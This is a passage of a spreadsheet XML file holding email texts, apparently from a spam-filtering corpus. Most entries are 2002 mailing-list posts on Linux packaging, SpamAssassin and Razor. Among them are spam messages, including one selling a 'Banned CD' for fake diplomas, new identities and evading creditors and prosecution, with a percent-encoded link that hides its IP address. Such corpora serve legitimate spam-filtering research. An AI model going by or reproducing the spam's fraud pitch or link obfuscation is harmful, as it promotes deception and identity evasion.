 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.5 01/15/2001
 iQCVAwUBPaScZlV9A5rVx7XZAQJlrgQAyxnhXLaYoas75wtCkQz7pr5jhTamXm9s
 85Tx9R9YcZtAAK67wd7U6ZqIOcr+J76G/xn2+gm6ASVRL4/ipETx9AFhdq8pG//w
 sU/8zYCxOrnmqVI62sYaqx2m4m75IrnSdqR5ARKHc2U05zQq47xuMxSTIrC/dwKK
 oyAlEFSe8Rw=
 =mVfx
 -----END PGP SIGNATURE-----
 --==_Exmh_1405404058P--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings ...
 &gt; PS: Yup, I'm back from my holidays ;-)
 	I hope you did not miss us at all ... ;-0
  &gt; I think I'll use this "--with &lt;whatever&gt;" switch more and more where
  &gt; possible.
 	Mmm, great stuff ... Now to get the RedHat Samba packager to do the same 
 thing ...
 	I have used there spec file and fun a few problems in it, and one of them 
 was just hashing out things for other use ...
 	Now to get to grips with the Kernel ... still have not found and easy way to 
 rebuild the Kernel without having to wait and hour for it to generate the 
 headers for all arch ... arrrrhhhh ...
 Mailed
 Lee
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Uh, WWII Enigma was cracked at Bletchly Park, based on the work of some 
 Poles, who had been trying to figure out when they would be invaded.   
 Entirely mechanical!   Definitely not optical at all.    Enigma was 
 originally broken based on bad use practice.  If it had been employed more 
 sensibly it would have been a lot harder.
 See "The Code Book" by Singh, Doubleday, 1999.     Or, for that matter, 
 "Cryptonomicon" by Stephenson, which is a fictionalization of the Enigma 
 cracking story, and pretty accurate.
 I eventually get born as a side-effect of the Battle of Britain, you 
 see....
 Computing with interference patterns, etc, makes perfect sense, but Enigma 
 was cracked by building mechanical systems that were essentially Enigma 
 machines and brute-forcing.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FIND ANYONE ANYWHERE ANYTHING
</t>
  </si>
  <si>
    <t xml:space="preserve">*****************BANNEDCD::::::::::::::::::::::::::::::::::&gt;NET******************
 I have been receiving emails saying that I'm contributing to the "moral decay of society" by selling the Banned CD.  That may be, but I feel strongly that you have a right to benefit from 
 this hard-to-find information. 
 So I am giving you ONE LAST CHANCE to order the Banned CD! 
 With this powerful CD, you will be able to investigate your friends, enemies and lovers in just minutes using the Internet.  You can track down old flames from college, or you can dig up some dirt on your boss to make sure you get that next promotion! 
 Or maybe you want a fake diploma to hang on your bedroom wall.  You'll find addresses for companies that make these diplomas on the Banned CD. 
 Need to disappear fast and never look back?  No problem! 
 Using the Banned CD, you will learn how to build a completely 
 new identity. 
 Obviously, the Powers That Be don't want you to have the Banned CD.  They have threatened me with lawsuits, fines, and even imprisonment unless I stop selling it immediately. But I feel that YOU have a Constitutional right to access this type of information, and I can't be intimidated. 
  Uncle Sam and your creditors are horrified that I am still selling this product!  There must be a price on my head! 
 Why are they so upset? Because this CD gives you freedom. 
 And you can't buy freedom at your local Walmart.  You will 
 have the freedom to avoid creditors, judgments, lawsuits, IRS 
 tax collectors, criminal indictments, your greedy ex-wife or 
 ex-husband, and MUCH more!
 Please Click the URL for the Detail! 
 http://%32%317.%31%30%36.%355%2E97
 {%RAND%}
 You are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from netcommission. To Be Removed From Our List, 
 http://%32%317.%31%30%36.%355%2E97/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 28 August 2002 04:38 pm, Daniel Quinlan wrote:
 &gt; Matthew Cline &lt;matt@nightrealms.com&gt; writes:
 &gt; &gt; There must be *some* way of tracking a spammer down, since they are
 &gt; &gt; planning on making money from the spam.  What a court would consider
 &gt; &gt; evidence of being the spammer is another question.
 &gt; Haha!!!
 &gt; Just a few notes:
 &gt;  - It will be difficult to find, prosecute, and win money from someone
 &gt;    in various non-friendly countries where spam originates (China is a
 &gt;    good example) even if they do officially "respect" copyright law.
 SA (and other filters) could be configured to ignore the SWE mark if it 
 appears to come from/through China.
 &gt;  - Spammers do not always remember to include contact information!  I
 &gt;    don't understand it either, but nobody said they were bright.  Also,
 &gt;    some spam is non-commercial or sent by a third-party (for example,
 &gt;    "pump and dump" stock scams), so contact information is not strictly
 &gt;    required for the spammer to get their way.
 SA could also be configured so that SWE marks are ignored in messages that 
 look like third-party spam (like stock scams).  Of course, this would still 
 mean that "The U.N. is going to invade America!" spams with SWE would get 
 through.  Probably also need to ignore SWE in messages that look like 
 Nigerian scams.
 -- 
 Give a man a match, and he'll be warm for a minute, but set him on
 fire, and he'll be warm for the rest of his life.
 ICQ: 132152059 | Advanced SPAM filtering software: http://spamassassin.org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</si>
  <si>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Gojomo:
 &gt;How about a highly error corrected atomic level 3D encoding scheme that 
 &gt;relies on shape, colour and chemical make up to uniquely identify every 
 &gt;object in the universe. Objects uniquely identify themselves - theres no 
 &gt;need for barcodes.
 That might work easily enough for reasonably rigid
 solids that can be positioned and fingerprinted. I
 think it would be more difficult for other items.
 Like a sweater. The exact pattern of threads is never
 quite the same, with the loose weave and all. The
 problem of automatically capturing any object's look,
 adequately to uniquely identifying it later, is still
 open research.
 _________________________________________________________________
 Send and receive Hotmail on your mobile device: http://mobile.msn.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] When is a wav not a wav?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 08:48:30PM +0100 or so it is rumoured hereabouts, 
 John Gay thought:
 &gt; 
 &gt; xanim can, and does play them correctly though. Unfortunately xanim does not 
 &gt; have any position control so you just have to listen to the album from start 
 &gt; to finish.
 &gt; 
 &gt; What I would like to do is split up the tracks and convert them the mp3 for 
 &gt; xmms. I'm jsut not sure what tools would be able to handle these strange 
 &gt; compressed wav's that only xanim seems to recognise? I like the albums, but 
 No idea if it can do these ones but mxv (or MixViews) has lots of
 configurables and it's whole purpose is to edit wavs.  I've used it to
 split up tapes into individual songs.  Not sure of a URL but the author is
 at
 MixViews@create.ucsb.edu
 Conor
 -- 
 Conor Daly &lt;conor.daly@oceanfree.net&gt;
 Domestic Sysadmin :-)
 ---------------------
 Faenor.cod.ie
  11:29pm  up 59 days,  8:46,  0 users,  load average: 0.05, 0.05, 0.01
 Hobbiton.cod.ie
  11:17pm  up 2 days,  5:54,  2 users,  load average: 0.00, 0.03, 0.00
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] dot-tk registrations hitting Razor
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin, can SA say "Listed in Razor2" when using Razor2? I get a lot of
 reports that are misreports to Razor1 not Razor2.
 If this is Razor2, then revocation will fix the problem. 
 cheers,
 vipul.
 On Wed, Aug 14, 2002 at 11:56:26AM +0100, Justin Mason wrote:
 &gt; 
 &gt; As the proud new owner of a free antarc.tk domain ;), I got a confirmation
 &gt; mail, which fell into Razor.
 &gt; 
 &gt; Looks like the fuzzy matching will hit on all confirmation mails until
 &gt; it's whitelisted.
 &gt; 
 &gt; just fyi,
 &gt; 
 &gt; --j.
 &gt; 
 &gt; ------- Forwarded Message
 &gt; 
 &gt; Date:    Wed, 14 Aug 2002 11:37:35 -0000
 &gt; From:    support@dot.tk (Dot TK registration center)
 &gt; To:      xxxxxx@xxxxx.xxx
 &gt; Subject: *****SPAM***** Please confirm your free registration
 &gt; 
 &gt; SPAM: -------------------- Start SpamAssassin results ----------------------
 &gt; SPAM: This mail is probably spam.  The original message has been altered
 &gt; SPAM: so you can recognise or block similar unwanted mail in future.
 &gt; SPAM: See http://spamassassin.org/tag/ for more details.
 &gt; SPAM: 
 &gt; SPAM: Content analysis details:   (7.5 hits, 7 required)
 &gt; SPAM: SEE_FOR_YOURSELF   (2.8 points)  BODY: See for yourself
 &gt; SPAM: SPAM_PHRASE_13_21  (1.5 points)  BODY: Contains phrases frequently found in spam
 &gt; SPAM: RAZOR_CHECK        (3.0 points)  Listed in Razor, see http://razor.sourceforge.net/
 &gt; SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was added by a relay (3)
 &gt; SPAM: 
 &gt; SPAM: -------------------- End of SpamAssassin results ---------------------
 &gt; 
 &gt; 
 &gt; Malo ni! 
 &gt; and thank you (faka fetai) 
 &gt; for registering with Dot TK!
 &gt; 
 &gt; Your e-mail address : xxxxxxx@xxxxx.xxx
 &gt; password: xxxxxxxxx
 &gt; 
 &gt; confirmation code: xxxxxxx
 &gt; (please note: this is not your password)
 &gt; 
 &gt; As you know we like to keep things simple, so all you need 
 &gt; to do to activate your Dot TK address is...
 &gt; 
 &gt; 1. Go to http://my.dot.tk/cgi-bin/confirm.taloha?tk=xxxxxx
 &gt; 
 &gt; 2. And enter your confirmation code
 &gt; 
 &gt; If you have received this email, but did not join us @ Dot TK,
 &gt; then somebody tried to register using your e-mail address. 
 &gt; 
 &gt; You can simply ignore this message... But why not come on in, 
 &gt; and see for yourself if your own -free- domain name is still 
 &gt; available at http://www.dot.tk
 &gt; 
 &gt; Any questions? Please visit our feedback page at
 &gt; http://www.dot.tk/cgi-bin/response.taloha
 &gt; Hope to see you soon at Dot TK.
 &gt; 
 &gt; Dot TK -- Dividing Domains Differently.
 &gt; 
 &gt; 
 &gt; 
 &gt; ------- End of Forwarded Message
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: Dice - The leading online job board
 &gt; for high-tech professionals. Search and apply for tech jobs today!
 &gt; http://seeker.dice.com/seeker.epl?rel_code=31
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson
</t>
  </si>
  <si>
    <t xml:space="preserve">[branching the thread, here]
     I found another Ximian repository- I don't know if it works yet...
 rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps
 rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps
 rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximian
 rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximian
 rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide
 rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide
     These guys are EXTREMELY apt-friendly.  Unlike most multimedia projects, they seem to prefer RPM/Apt over the older methods.  Isn't that cool?
     Hey- how would I have known to "apt-get install gnome-session" to kick all this off?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</si>
  <si>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Subject: Get McAfee VirusScan for just $19.95! 60% Off!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body bgcolor="#ffffff"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="747"&gt;
 &lt;!-- fwtable fwsrc="Untitled" fwbase="viruslandingpagedoneemail_19.jpg" fwstyle="Dreamweaver" fwdocid = "742308039" fwnested="1" --&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="747"&gt;
 	  &lt;tr&gt;
 	   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.1.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r1_c1" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r1_c1.gif" width="306" height="73" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 	   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.2.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r1_c3" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r1_c3.gif" width="441" height="73" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="747"&gt;
 	  &lt;tr&gt;
 	   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.3.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r2_c1" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r2_c1.jpg" width="6" height="398" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 	   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="741"&gt;
 		  &lt;tr&gt;
 		   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="741"&gt;
 			  &lt;tr&gt;
 			   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.4.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r2_c2" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r2_c2.gif" width="538" height="104" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="203"&gt;
 				  &lt;tr&gt;
 				   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.5.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r2_c6" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r2_c6.gif" width="203" height="68" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				  &lt;/tr&gt;
 				  &lt;tr&gt;
 				   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.6.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r3_c6" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r3_c6.jpg" width="203" height="36" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				  &lt;/tr&gt;
 				&lt;/table&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;&lt;/td&gt;
 		  &lt;/tr&gt;
 		  &lt;tr&gt;
 		   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="741"&gt;
 			  &lt;tr&gt;
 			   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="501"&gt;
 				  &lt;tr&gt;
 				   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="501"&gt;
 					  &lt;tr&gt;
 					   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.7.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r4_c2" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r4_c2.gif" width="420" height="258" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.8.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r4_c4" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r4_c4.gif" width="81" height="258" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					  &lt;/tr&gt;
 					&lt;/table&gt;&lt;/td&gt;
 				  &lt;/tr&gt;
 				  &lt;tr&gt;
 				   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.9.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r7_c2" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r7_c2.gif" width="501" height="36" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				  &lt;/tr&gt;
 				&lt;/table&gt;&lt;/td&gt;
 			   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="240"&gt;
 				  &lt;tr&gt;
 				   &lt;td&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="240"&gt;
 					  &lt;tr&gt;
 					   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.10.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r4_c5" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r4_c5.jpg" width="37" height="146" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.11.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r4_c6" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r4_c6.jpg" width="203" height="146" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					  &lt;/tr&gt;
 					&lt;/table&gt;&lt;/td&gt;
 				  &lt;/tr&gt;
 				  &lt;tr&gt;
 				   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.12.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r5_c5" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r5_c5.gif" width="240" height="65" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				  &lt;/tr&gt;
 				  &lt;tr&gt;
 				   &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.13.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r6_c5" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r6_c5.jpg" width="240" height="83" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				  &lt;/tr&gt;
 				&lt;/table&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;&lt;/td&gt;
 		  &lt;/tr&gt;
 		&lt;/table&gt;&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.14.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r8_c1" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r8_c1.jpg" width="747" height="89" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2k50.15.gda.fsi52" target= "_blank"&gt;&lt;img name="viruslandingpagedoneemail_19_r9_c1" src="http://www.partner2profit.com/creatives/mcaffee/viruslandingpagedoneemail_19_r9_c1.jpg" width="747" height="2" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;HTML&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;CENTER&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=2 CELLPADDING=3 BORDER=0&gt;
 &lt;FORM METHOD=GET ACTION="http://i.mb00.net/cgi-bin/pmg_subscribe.pl"&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#DDDDDD"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;I&gt;Remove yourself from this list by either:&lt;/I&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Entering your email address below and clicking REMOVE:&lt;BR&gt;
     &lt;CENTER&gt;
     &lt;INPUT TYPE="hidden" NAME="list" VALUE="ebargains:*"&gt;
     &lt;INPUT TYPE="hidden" NAME="server_action" VALUE="Unsubscribe"&gt;
     &lt;INPUT TYPE="text" NAME="email_address" VALUE="cypherpunks@einstein.ssz.com" SIZE=25&gt;&lt;/FONT&gt;
     &lt;INPUT TYPE="submit" VALUE="REMOVE"&gt;
     &lt;/CENTER&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;B&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/B&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Reply to this message with the word &amp;quot;remove&amp;quot; in the subject line.
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/FORM&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD BGCOLOR="#FFFFFF" ALIGN="CENTER"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#000000"&gt;
   This message was sent to address cypherpunks@einstein.ssz.com
   &lt;/FONT&gt;
 &lt;!--
 X-PMG-Recipient: cypherpunks@einstein.ssz.com
 X-PMG-Msgid: 1024851440.18684
 X-PMG-Userid: ebargains:*
 --&gt;
 &lt;DIV ALIGN="CENTER"&gt;
 &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#AAAAAA"&gt;pmguid:1dx.2k50.fsi52&lt;/FONT&gt;&lt;/DIV&gt;&lt;BR CLEAR="ALL"&gt;
 &lt;IMG SRC="http://r.mb00.net/s/o?1dx.2k50.0.fsi52" WIDTH=33 HEIGHT=12 BORDER=0 ALIGN="RIGHT" ALT="pmg"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;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</si>
  <si>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BlogStart: 
 **Dublin**: something from the archives.    Daev Walsh forwards an article from
 The Irish Digest about ''Billy in the Bowl''.  This story is also immortalised
 in an old Dublin song, which in turn was mentioned in a Pogues track.  Billy
 was a legless beggar in the alleys of Stoneybatter and Grangegorman (where I
 now live) during the 18th century, who discovered a new, but not entirely
 legal, way to make money.
 BlogEnd: 
 LinkText: Billy in the Bowl
 From:         daev &lt;hellshaw@fringeware.com&gt;
 Subject:      The Case of the Stoneybatter Strangler
 A story of my new neighbourhood...
 The Irish Digest July 1964
 The Case of the Stoneybatter Strangler
 The handsome, deformed Billy in the Bowl evolved a plan to rob his donors.
 Then, one night, he made the biggest mistake of his life 
 DUBLIN in the eighteenth century was noted for two things - the
 architectural beauty of its public buildings and the large number of
 beggars who sought alms in its maze of streets and lanes.  Many of these
 beggars relied on visitors and the gentry for their coin, but there was one
 who campaigned among the working class.  This was "Billy In The Bowl"
 The strange appellation was derived from the fact that Billy's sole means
 of transport was a large bowl-shaped car with wheels.  Seated in this "
 bowl ", the beggar would propel himself along by pushing against the ground
 with wooden plugs, one in each hand.
 Billy's unusual means of conveyance was vitally necessary, as he had been
 born without legs.  Nature, however, had compensated for this by endowing
 him with powerful arms and shoulders and, what was most important, an
 unusually handsome face.
 This was Billy's greatest asset in his daily routine of separating
 sympathetic passers-by from their small change.
 The cunning young beggar would wait at a convenient spot on one of the many
 lonely roads or lanes which were a feature of eighteenth century
 Grangegorman and Stoneybatter, until a servant girl or an old lady would
 come along.
 He would then put on is most attractive smile which, together with his
 black curly hair, never failed to halt the females.  The fact that such a
 handsome young man was so terribly handicapped physically always evoked pity.
 "Billy in the Bowl", however, wasn't satisfied with becoming the daily
 owner of a generous number of small coins; what his greed demanded were
 substantial sums of money.  The more he managed to get the more he could
 indulge in his pet vices - gambling and drinking.
 As a result the beggar evolved a plan to rob unsuspecting sympathisers.
 The first time lie put his plan into operation was on a cold March evening
 as dusk, was falling.  The victim was a middle aged woman who was passing
 through Grangegorman Lane on her way to visit friends in Queen Street - on
 Dublin's North Quays.
 When Billy heard the woman's footsteps, he hid behind some bushes in a
 ditch which skirted the lane.  As his unsuspecting victim drew close, the
 beggar moaned and shouted, and cried out for help.
 Trembling with excitement, the woman dashed to the spot where Billy lay
 concealed.  She bent down to help the beggar out of the ditch, when two
 powerful arms closed around her throat and pulled her into the bushes.
 In a few minutes it was all over.  The woman lay in a dead faint, and Billy
 was travelling at a fast rate down the lane in his " bowl ", his victirn's
 purse snug in his coat pocket.  An hour after the robbery the woman was
 found in a distracted condition, but failed to give a description of her
 assailant.  And, as "Billy in the Bowl" had figured, nobody would suspect a
 deformed beggar.
 Again and again the beggar carried out his robbery plan, always shifting
 the place of attack to a different part of Grangegorman or  Stoneybatter.
 On one occasion " Billy in "the Bowl " tried his tactics on a sturdy
 servant girl who put up such a vigorous resistance that he was forced to
 strangle her.  The incident became known as the 11 Grangegorman Lane Murder
 and caused a great stir.
 Hundred.s flocked to the scene of the crime and for a couple of months
 "Billy in the Bowl" was forced to desert his usual haunts.  Around this
 period, Dublin's first-ever police force was been mobilised, and the first
 case they were confronted with was the Grangegorman lane murder.
 Months passed and  "Billy in the Bowl" reverted once again to his old
 pasttime.  A number of young servant girls were lured into ditches and
 robbed, and the police were inundated with so many complaints that a
 nightly patrol was placed on the district.  But the beggar still rolled
 along in his "bowl" pitied and unsuspected.  Then came the night that
 finished Billy's career of crime.
 Two stoudy built female cooks, trudging back to their places of employment
 after a night out in the city, were surprised and not a little shocked to
 hear shouts for help.  Rushing over, they came upon a huddled figure in the
 ditch.
 Billy, thinking there was only one woman, grabbed one of the cooks and
 tried to pull her into the ditch.  She proved much too strong for him,
 however) and while resisting tore 'at his face with her sharp finger-nails.
 Meanwhile, her companion acted with speed and daring.  Pulling out her
 large hatpin she made .for the beggar, and plunged the pin into his right eye.
 The screams and howls of the wounded beggar reverberated throughout the
 district and brought people dashing to the scene.  Among them was a member
 of the nightly police patrol who promptly arrested the groaning Billy.
 "Billy in the Bowl" was tried and sentenced for robbery with violence, but
 they could never prove it was he who had strangled the servant girl.  The
 Grangegorman-Stoneybatter district became once again a quiet, attractive
 Dublin suburb where old ladies strolled, and carefree servant girls laughed
 and giggled as they wended their way home at night.
 daev
 _______________________________
 Rev.  Dave 'daev' Walsh, daev@fringeware.com
 Home:  http://www.fringeware.com/hell
 Weekly Rant: http://www.nua.ie/blather
 'Is it about a bicycle?'-Sgt.Pluck, 
 'The Third Policeman', by Flann O'Brien
 ________________________________
 Holistic Pet Detective, Owl Worrier, Snark Hunter 
 ________________________________
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002 bitbitch@magnesium.net wrote:
 --]I'm truly stuck on this though.  I don't know whether to frame the
 --]check, burn it, or cash it in.
 I framed my 2$ check from mp3.com. Someone bought the Cd I have up there
 some years back and it is my real and actual proof in saying I am a paid
 musician. Of course I never cashed the check so techinaly I never did get
 paid...but thats another matter alltogther.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Monkey or man?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723993,215/
 Date: 2002-10-10T03:26:58+01:00
 Toumai, hailed as our oldest ancestor, is stirring ancient scientific 
 rivalries.Quizzes[1]| Crossword[2]| Interactive guides[3]| Steve Bell[4]| 
 Weblog[5]*Other news and comment**Blair ready to suspend Stormont*[6]
 [1] http://www.newsisfree.com/quiz/0,7476,349695,00.html
 [2] http://www.newsisfree.com/crossword/0,4406,180778,00.html
 [3] http://www.newsisfree.com/interactive/0,2759,192055,00.html
 [4] http://www.newsisfree.com/cartoons/0,7371,337484,00.html
 [5] http://www.newsisfree.com/weblog/0,6798,517233,00.html
 [6] http://www.newsisfree.com/Northern_Ireland/Story/0,2763,808962,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Shop web site is NOT being SEEN!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: moooozilla
</t>
  </si>
  <si>
    <t xml:space="preserve">funny load message:
 moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!Document http://flog.us/ 
 loaded successfully
 teehee
 C
 -- 
 "My theology, briefly, is that the universe was dictated but not
           signed."  (Christopher Morley) 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-29 at 00:02, Ville Skytt wrote:
 &gt; &gt; Thanks a *lot* !  The RPMs seem to be fine, they worked for me out of
 &gt; &gt; the box (on vanilla Valhalla w/latest errata).
 &gt; 
 &gt; ...except that I don't see an init script in the RPMs, a sample one
 &gt; designed for RH is supposed to be in "utils/alsasound".  Could you take
 &gt; a look if it can be included?
 Ok, some more nits: alsa-xmms doesn't work if I don't have
 alsa-lib-devel installed, but xmms dies on startup telling me:
    Cannot load alsa library: libasound.so: cannot open shared object
    file: No such file or directory
 libasound.so is part of alsa-lib-devel... if I install it, the ALSA XMMS
 output plugins works fine.
 I can't install the xine stuff, because xine-libs needs libGLcore.so.1,
 which I can't find anywhere (NVidia stuff?  I have Radeon 7500...)
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002 the voices made Jason R. Mastaler write:
 &gt; jm@jmason.org (Justin Mason) writes:
 &gt;
